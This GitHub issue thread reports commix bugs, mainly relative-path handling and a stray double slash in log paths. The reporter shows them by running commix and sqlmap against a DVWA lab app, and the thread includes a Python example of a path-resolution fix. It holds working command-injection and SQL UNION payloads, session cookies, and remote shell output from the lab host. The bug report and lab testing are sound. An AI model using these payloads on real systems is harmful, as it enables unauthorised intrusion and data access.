
BUG: BULKFILE requires absolute path and parameter injection improvement if not specified #905

Closed
U53RW4R3 opened this issue Apr 18, 2024 · 6 comments

Comments

@U53RW4R3

U53RW4R3 commented Apr 18, 2024

What are the running context details?

  • Installation method

$ sudo apt install -y commix

  • Client OS is Kali Linux

  • Target OS is Ubuntu 22.04

  • Program version

$ commix --version    
v3.9-stable

Parameter Injection

In the DNS hosts file for easy navigation in the URL.

$ sudo nano /etc/hosts
<DVWA_IP>	dvwa.local

Pretty sure you're still aware of the pseudo-terminal: when I list the files (ls -l) it gives me

$ commix -u "http://dvwa.local/dvwa/vulnerabilities/exec/#" --cookie="PHPSESSID=bhku2r9d3a48vjr2s7hv52gq98; security=low" -d "ip=localhost&Submit=Submit" --random-agent -p ip --prefix=";" --technique=c
[21:52:20] [info] Testing connection to the target URL. 
[21:52:20] [info] The fetched random HTTP User-Agent header value is 'Opera/8.51 (Macintosh; PPC Mac OS X; U; de)'.
Got a  redirect to 'http://dvwa.local/dvwa/vulnerabilities/exec/'. Do you want to follow? [Y/n] > 
[21:52:50] [info] Following redirection to 'http://dvwa.local/dvwa/vulnerabilities/exec/'. 
[21:52:50] [info] Performing identification checks to the target URL.
[21:52:53] [warning] Target's estimated response time is 3 seconds. That may cause serious delays during the data extraction procedure and/or possible corruptions over the extracted data.
[21:52:53] [info] Setting POST parameter 'ip' for tests.
[21:52:53] [warning] Heuristic (basic) tests shows that POST parameter 'ip' might not be injectable.
[21:53:04] [info] Testing the (results-based) classic command injection technique.           
[21:53:04] [info] POST parameter 'ip' appears to be injectable via (results-based) classic command injection technique.
           |_ localhost;echo LKHGJO$((52+82))$(echo LKHGJO)LKHGJO
POST parameter 'ip' is vulnerable. Do you want to prompt for a pseudo-terminal shell? [Y/n] > 
Pseudo-Terminal Shell (type '?' for available options)
commix(os_shell) > ls -l
total 12 drwxr-xr-x 2 root root 4096 Feb 27 10:53 help -rw-r--r-- 1 root root 1829 Feb 27 10:53 index.php drwxr-xr-x 2 root root 4096 Feb 27 10:53 source

The rest of the commands are fine.

commix(os_shell) > pwd
/var/www/html/dvwa/vulnerabilities/exec
commix(os_shell) > uname -a
Linux ubuntulinux 6.5.0-21-generic #21~22.04.1-Ubuntu SMP PREEMPT_DYNAMIC Fri Feb 9 13:32:52 UTC 2 x86_64 x86_64 x86_64 GNU/Linux

When I issue help (?) command it terminates the console.

commix(os_shell) > ?
Available 'os_shell' options:
 * Type '?' to get all the available options.
 * Type 'back' to move back from the current context.
 * Type 'quit' / 'exit' (or use <Ctrl-C>) to quit commix.
 * Type 'reverse_tcp' to get a reverse TCP connection.
 * Type 'bind_tcp' to set a bind TCP connection.
[21:53:51] [info] Fetched data logged to text files under '/usr/share/commix//home/user/.commix/output/dvwa.local/logs.txt'.

Two additional front slashes and wrong path: /usr/share/commix//home/user/.commix/output/dvwa.local/logs.txt. However, the log file is there along with session and history.

$ ls -l ~/.commix/output/dvwa.local/
total 20
-rw------- 1 user user    21 Apr 17 21:53 cli_history
-rw-r--r-- 1 user user  1630 Apr 17 21:54 logs.txt
-rw-r--r-- 1 user user 12288 Apr 17 21:53 session.db

The workaround is to execute a single command with --os-cmd, and there's no issue so far.

$ commix -u "http://dvwa.local/dvwa/vulnerabilities/exec/#" --cookie="PHPSESSID=bhku2r9d3a48vjr2s7hv52gq98; security=low" -d "ip=localhost&Submit=Submit" --random-agent --os-cmd="uname -a"
[21:54:52] [info] Setting POST parameter 'ip' for tests.
A previously stored session has been held against that target. Do you want to resume to (results-based) classic command injection point? [Y/n] > 
[21:54:54] [info] POST parameter 'ip' appears to be injectable via (results-based) classic command injection technique.
           |_ localhost;echo LKHGJO$((52+82))$(echo LKHGJO)LKHGJO
[21:54:54] [info] Executing the user-supplied command: 'uname -a'.
[21:54:54] [info] 'uname -a' execution output: Linux ubuntulinux 6.5.0-21-generic #21~22.04.1-Ubuntu SMP PREEMPT_DYNAMIC Fri Feb 9 13:32:52 UTC 2 x86_64 x86_64 x86_64 GNU/Linux
POST parameter 'ip' is vulnerable. Do you want to prompt for a pseudo-terminal shell? [Y/n] > 
Pseudo-Terminal Shell (type '?' for available options)

I discovered that when I use --batch and skip using the console (--answers="pseudo-terminal=N"), it started to inject commands in the Submit POST parameter, for which I'm supposed to pass the argument (-p Submit), but that wasn't my intention. I think it's the session file (~/.commix/output/dvwa.local/session.db).

$ commix -u "http://dvwa.local/dvwa/vulnerabilities/exec/#" --cookie="PHPSESSID=bhku2r9d3a48vjr2s7hv52gq98; security=low" -d "ip=localhost&Submit=Submit" --random-agent --os-cmd="uname -a" --batch --answers="pseudo-terminal=N"
[22:03:28] [info] Setting POST parameter 'ip' for tests.
A previously stored session has been held against that target. Do you want to resume to (results-based) classic command injection point? [Y/n] > Y
[22:03:28] [info] POST parameter 'ip' appears to be injectable via (results-based) classic command injection technique.
           |_ localhost;echo LKHGJO$((52+82))$(echo LKHGJO)LKHGJO
[22:03:28] [info] Executing the user-supplied command: 'uname -a'.
[22:03:28] [info] 'uname -a' execution output: Linux ubuntulinux 6.5.0-21-generic #21~22.04.1-Ubuntu SMP PREEMPT_DYNAMIC Fri Feb 9 13:32:52 UTC 2 x86_64 x86_64 x86_64 GNU/Linux

Now here's the interesting part: it doesn't receive any output when I want to execute a single command with --os-cmd="uname -a". It already worked once, so I have no idea what's going on. Probably there is something wrong with the cookies, I think. I don't believe this is a bug, so you can ignore this part.

$ commix -u "http://dvwa.local/dvwa/vulnerabilities/exec/#" --cookie="PHPSESSID=bhku2r9d3a48vjr2s7hv52gq98; security=low" -d "ip=localhost&Submit=Submit" --random-agent --os-cmd="uname -a"                                      
[23:25:51] [info] Testing connection to the target URL. 
[23:25:51] [info] The fetched random HTTP User-Agent header value is 'mozilla/3.0 (Windows NT 6.1; rv:2.0.1) Gecko/20100101 Firefox/5.0.1'.
Got a  redirect to 'http://dvwa.local/dvwa/vulnerabilities/exec/'. Do you want to follow? [Y/n] > 
[23:26:06] [info] Following redirection to 'http://dvwa.local/dvwa/vulnerabilities/exec/'. 
[23:26:06] [info] Performing identification checks to the target URL.

No output.

[23:26:09] [warning] Target's estimated response time is 3 seconds. That may cause serious delays during the data extraction procedure and/or possible corruptions over the extracted data.
[23:26:09] [info] Setting POST parameter 'ip' for tests.
A previously stored session has been held against that target. Do you want to resume to (results-based) classic command injection point? [Y/n] > 
[23:26:15] [info] POST parameter 'ip' appears to be injectable via (results-based) classic command injection technique.
           |_ localhost;echo TZQGIU$((70+4))$(echo TZQGIU)TZQGIU
[23:26:15] [info] Executing the user-supplied command: 'uname -a'.
[23:26:15] [error] The execution of 'uname -a' command, does not return any output.
POST parameter 'ip' is vulnerable. Do you want to prompt for a pseudo-terminal shell? [Y/n] > 
Pseudo-Terminal Shell (type '?' for available options)
commix(os_shell) > uname -a
[23:29:27] [error] The execution of 'uname -a' command, does not return any output.
commix(os_shell) >

The fix is to purge the previous session and re-run the exploit.

$ commix --purge

[23:30:51] [info] Purging content of directory '/home/user/.commix/output/'.

$ commix -u "http://dvwa.local/dvwa/vulnerabilities/exec/#" --cookie="PHPSESSID=mae5m4vre6omrga1k51k6uj6bm;security=low" -d "ip=localhost&Submit=Submit" --random-agent -p ip --prefix=";" --technique=c --os-cmd="uname -a"
[23:32:07] [info] POST parameter 'ip' appears to be injectable via (results-based) classic command injection technique.
           |_ localhost;echo PSIXTB$((1+57))$(echo PSIXTB)PSIXTB
[23:32:07] [info] Executing the user-supplied command: 'uname -a'.
[23:32:16] [info] 'uname -a' execution output: Linux ubuntulinux 6.5.0-21-generic #21~22.04.1-Ubuntu SMP PREEMPT_DYNAMIC Fri Feb 9 13:32:52 UTC 2 x86_64 x86_64 x86_64 GNU/Linux
POST parameter 'ip' is vulnerable. Do you want to prompt for a pseudo-terminal shell? [Y/n] > n
Do you want to continue with testing the classic command injection technique? [y/N] > 
Skipping of further command injection tests is recommended. Do you agree? [Y/n] > 
[23:32:27] [info] Fetched data logged to text files under '/usr/share/commix//home/user/.commix/output/dvwa.local/logs.txt'.

I've used --batch and skipped the console (--answers="pseudo-terminal=N"), but it does the same thing and injects the Submit parameter, and I didn't specify the parameter with -p Submit. It's supposed to terminate the program when the adversary is in the post-exploitation phase.

$ commix -u "http://dvwa.local/dvwa/vulnerabilities/exec/#" --cookie="PHPSESSID=mae5m4vre6omrga1k51k6uj6bm;security=low" -d "ip=localhost&Submit=Submit" --random-agent --os-cmd="uname -a" --batch --answers="pseudo-terminal=N"
[23:35:11] [info] POST parameter 'ip' appears to be injectable via (results-based) classic command injection technique.
           |_ localhost;echo PSIXTB$((1+57))$(echo PSIXTB)PSIXTB
[23:35:11] [info] Executing the user-supplied command: 'uname -a'.
[23:35:11] [info] 'uname -a' execution output: Linux ubuntulinux 6.5.0-21-generic #21~22.04.1-Ubuntu SMP PREEMPT_DYNAMIC Fri Feb 9 13:32:52 UTC 2 x86_64 x86_64 x86_64 GNU/Linux
POST parameter 'ip' is vulnerable. Do you want to prompt for a pseudo-terminal shell? [Y/n] > N
Do you want to continue with testing the classic command injection technique? [y/N] > N
Skipping of further command injection tests is recommended. Do you agree? [Y/n] > Y
[23:35:14] [warning] Target's estimated response time is 3 seconds. That may cause serious delays during the data extraction procedure and/or possible corruptions over the extracted data.
[23:35:14] [info] Setting POST parameter 'Submit' for tests.

You can reproduce this with sqlmap to see that it's not required to pass the parameters after it was exploited, which is why commix requires a bit of improvement.

$ sqlmap -u "http://dvwa.local/dvwa/vulnerabilities/sqli/?id=1&Submit=Submit#" --cookie="PHPSESSID=mae5m4vre6omrga1k51k6uj6bm;security=low" --random-agent -p id --dbms=mysql --technique=U --union-cols=2
[23:40:30] [INFO] GET parameter 'id' is 'Generic UNION query (NULL) - 2 to 2 columns (custom)' injectable
[23:40:30] [INFO] checking if the injection point on GET parameter 'id' is a false positive
GET parameter 'id' is vulnerable. Do you want to keep testing the others (if any)? [y/N] 

sqlmap identified the following injection point(s) with a total of 51 HTTP(s) requests:
---
Parameter: id (GET)
    Type: UNION query
    Title: Generic UNION query (NULL) - 2 columns (custom)
    Payload: id=1' UNION ALL SELECT CONCAT(0x71707a7071,0x6a4877516b566d54574c4477676e4350444b4b4c6b767555446d674e59706f4a496b517849695467,0x7170627171),NULL-- -&Submit=Submit
---

$ sqlmap -u "http://dvwa.local/dvwa/vulnerabilities/sqli/?id=1&Submit=Submit#" --cookie="PHPSESSID=mae5m4vre6omrga1k51k6uj6bm;security=low" --random-agent --dbs
available databases [5]:
[*] dvwa
[*] information_schema
[*] mysql
[*] performance_schema
[*] sys

BULKFILE when scanning URLs

Last but not least, the BULKFILE flag (-m) requires an absolute path in order to scan the URLs.

$ commix -m /home/user/urls.txt --cookie="PHPSESSID=mae5m4vre6omrga1k51k6uj6bm; security=low" -d "ip=localhost&Submit=Submit" --random-agent -p ip --prefix=";" --technique=c
[1/1] URL - http://dvwa.local/dvwa/vulnerabilities/exec/#
Do you want to use URL #1 to perform tests? [Y/n] > 
[23:46:57] [info] Testing connection to the target URL.

$ commix -m $(pwd)/urls.txt --cookie="PHPSESSID=mae5m4vre6omrga1k51k6uj6bm; security=low" -d "ip=localhost&Submit=Submit" --random-agent -p ip --prefix=";" --technique=c
[23:44:23] [info] Parsing targets using the 'urls.txt' file.  
[23:44:23] [info] Found a total of 1 target.
[1/1] URL - http://dvwa.local/dvwa/vulnerabilities/exec/#
Do you want to use URL #1 to perform tests? [Y/n] > 
[23:44:27] [info] Testing connection to the target URL. 
[23:44:27] [info] The fetched random HTTP User-Agent header value is 'Mozilla/5.0 (MSIE 7.0; Macintosh; U; SunOS; X11; gu; SV1; InfoPath.2; .NET CLR 3.0.04506.31; .NET CLR 3.0.04506.648)'.
Got a  redirect to 'http://dvwa.local/dvwa/vulnerabilities/exec/'. Do you want to follow? [Y/n] > 
[23:45:31] [info] Following redirection to 'http://dvwa.local/dvwa/vulnerabilities/exec/'. 
[23:45:31] [info] Performing identification checks to the target URL.
[23:45:34] [warning] Target's estimated response time is 3 seconds. That may cause serious delays during the data extraction procedure and/or possible corruptions over the extracted data.
[23:45:34] [info] Setting POST parameter 'ip' for tests.
[23:45:34] [warning] Heuristic (basic) tests shows that POST parameter 'ip' might not be injectable.
[23:45:44] [info] Testing the (results-based) classic command injection technique.           
[23:45:44] [info] POST parameter 'ip' appears to be injectable via (results-based) classic command injection technique.
           |_ localhost;echo KLEXAC$((25+77))$(echo KLEXAC)KLEXAC

If not, it won't recognize the file's existence. The --output-dir flag is also affected by this bug, which corresponds with the output path /usr/share/commix//home/user/.commix/output/dvwa.local/logs.txt.

$ cat urls.txt
http://dvwa.local/dvwa/vulnerabilities/exec/#

$ commix -m urls.txt --cookie="PHPSESSID=mae5m4vre6omrga1k51k6uj6bm; security=low" -d "ip=localhost&Submit=Submit" --random-agent -p ip --prefix=";" --technique=c
[23:44:01] [info] Parsing targets using the 'urls.txt' file.  
[23:44:01] [critical] It seems that the 'urls.txt' file, does not exist.

$ commix -m ./urls.txt --cookie="PHPSESSID=mae5m4vre6omrga1k51k6uj6bm; security=low" -d "ip=localhost&Submit=Submit" --random-agent -p ip --prefix=";" --technique=c
[23:44:08] [info] Parsing targets using the 'urls.txt' file.  
[23:44:08] [critical] It seems that the 'urls.txt' file, does not exist.
@stasinopoulos
Member

Thank you for your time and the detailed report.
Several of the issues you mention will be fixed in version v4.0-stable.

@U53RW4R3
Author

Also, -r request.txt requires an absolute path, which is the same problem as with --output-dir. Commix thinks the files are included and stored in /usr/share/commix.
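
The "file does not exist" error for a relative -m path and the `/usr/share/commix//home/user/...` string both belong to one bug class: a tool that changes into its own install directory and only then looks at user-supplied paths, and that builds the log line by string concatenation. The following is an added illustration, not commix's own code; the install directory `/usr/share/commix` and the `//` path come from the issue, while the invoking directory `/home/user`, the home directory and the function names are constructed for the example. It shows the buggy lookup beside the fix: resolve every user path against the directory the user ran the command from, before any chdir, and join with `posixpath.join` rather than `+ "/" +`.

```python
"""Added example (not part of commix): why relative -m / -r / --output-dir
paths get looked up in the install directory, and where the '//' comes from.
All paths below are constructed sample values for the demonstration."""
import posixpath  # POSIX semantics regardless of host, so results are deterministic

INSTALL_DIR = "/usr/share/commix"   # where the apt-installed tool lives (from the issue)
INVOKING_CWD = "/home/user"        # constructed: directory the user typed the command in
HOME_DIR = "/home/user"            # constructed: used for '~' expansion below


def naive_lookup(user_path: str, tool_cwd: str = INSTALL_DIR) -> str:
    """Buggy behaviour: the tool has already chdir'ed into its install
    directory, so a relative 'urls.txt' or './urls.txt' is looked up there
    instead of where the user is. Hence "the 'urls.txt' file does not exist"."""
    return posixpath.normpath(posixpath.join(tool_cwd, user_path))


def naive_log_path(output_path: str, tool_dir: str = INSTALL_DIR) -> str:
    """Buggy behaviour: concatenating with '+ "/" +' yields 'dir//abs/path'
    whenever output_path is already absolute."""
    return tool_dir + "/" + output_path


def resolve_user_path(user_path: str,
                      invoking_cwd: str = INVOKING_CWD,
                      home: str = HOME_DIR) -> str:
    """Fixed behaviour: make the path absolute against the directory the user
    invoked the tool from (captured before any chdir), expand a leading '~'
    and normalise '.' and '..' segments. Absolute input is returned unchanged."""
    if user_path == "~" or user_path.startswith("~/"):
        user_path = home + user_path[1:]
    if not posixpath.isabs(user_path):
        user_path = posixpath.join(invoking_cwd, user_path)
    return posixpath.normpath(user_path)


def fixed_log_path(output_path: str, tool_dir: str = INSTALL_DIR) -> str:
    """Fixed behaviour: posixpath.join discards earlier components when a later
    one is absolute, so an absolute output path is never glued onto tool_dir."""
    return posixpath.join(tool_dir, output_path)


def main() -> None:
    # Reproduce the three observations from the issue, then show the fixed values.
    for p in ("urls.txt", "./urls.txt", "/home/user/urls.txt"):
        print(f"-m {p!r}: looked up at {naive_lookup(p)}  ->  should be {resolve_user_path(p)}")
    logs = "/home/user/.commix/output/dvwa.local/logs.txt"
    print("buggy log line :", naive_log_path(logs))
    print("fixed log line :", fixed_log_path(logs))
    # --output-dir=../vulns typed from /home/user/commix (the dev-version run in the thread)
    print("--output-dir ../vulns ->", resolve_user_path("../vulns", "/home/user/commix"))


if __name__ == "__main__":
    main()
```

Only the absolute form survives `naive_lookup` unchanged, which matches the thread: `-m /home/user/urls.txt` and `-m $(pwd)/urls.txt` work while `urls.txt` and `./urls.txt` are reported missing. Capturing `os.getcwd()` once at startup and passing it as `invoking_cwd` is the whole fix on the lookup side; the `//` disappears as soon as the log line is built with `posixpath.join` (or `os.path.join`) instead of concatenation.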

@stasinopoulos
Member

Take a look at the dev version using git clone (that is under development / code refactoring). Some of the issues you mention (i.e. about slashes etc.) have been resolved.

@U53RW4R3
Author

The path specification works and the issue has been resolved.

$ ./commix.py -m urls.txt --cookie="security=low; PHPSESSID=4enqpmsuibona05k9pqrrg5nqk" -d "ip=localhost&Submit=Submit" --random-agent -p ip --prefix=";" --technique=C
[06:54:18] [info] Parsing targets using the 'urls.txt' file.  
[06:54:18] [info] Found a total of 1 target.
[1/1] URL - http://dvwa.local/dvwa/vulnerabilities/exec/#
Do you want to use URL #1 to perform tests? [Y/n] > 

However, the double slashes haven't been resolved. But specifying the path wasn't an issue any longer.

$ ./commix.py -m urls.txt --cookie="security=low; PHPSESSID=4enqpmsuibona05k9pqrrg5nqk" -d "ip=localhost&Submit=Submit" --random-agent -p ip --prefix=";" --technique=C --output-dir=../vulns
[06:57:18] [info] Fetched data logged to text files under '/home/user/commix//home/user/vulns/dvwa.local/logs.txt'.

$ ls ~/vulns/dvwa.local 
cli_history  logs.txt  session.db

@stasinopoulos
Member

FYI, the issue regarding the help (?) command (that terminates the console) is on my to-do list (I'll let ya know).

@stasinopoulos
Member

The "double slashes" issue has been resolved.

@stasinopoulos stasinopoulos self-assigned this May 13, 2024
stasinopoulos added a commit that referenced this issue May 17, 2024
… continue testing the remaining parameters, if one is found vulnerable.. Ref: #905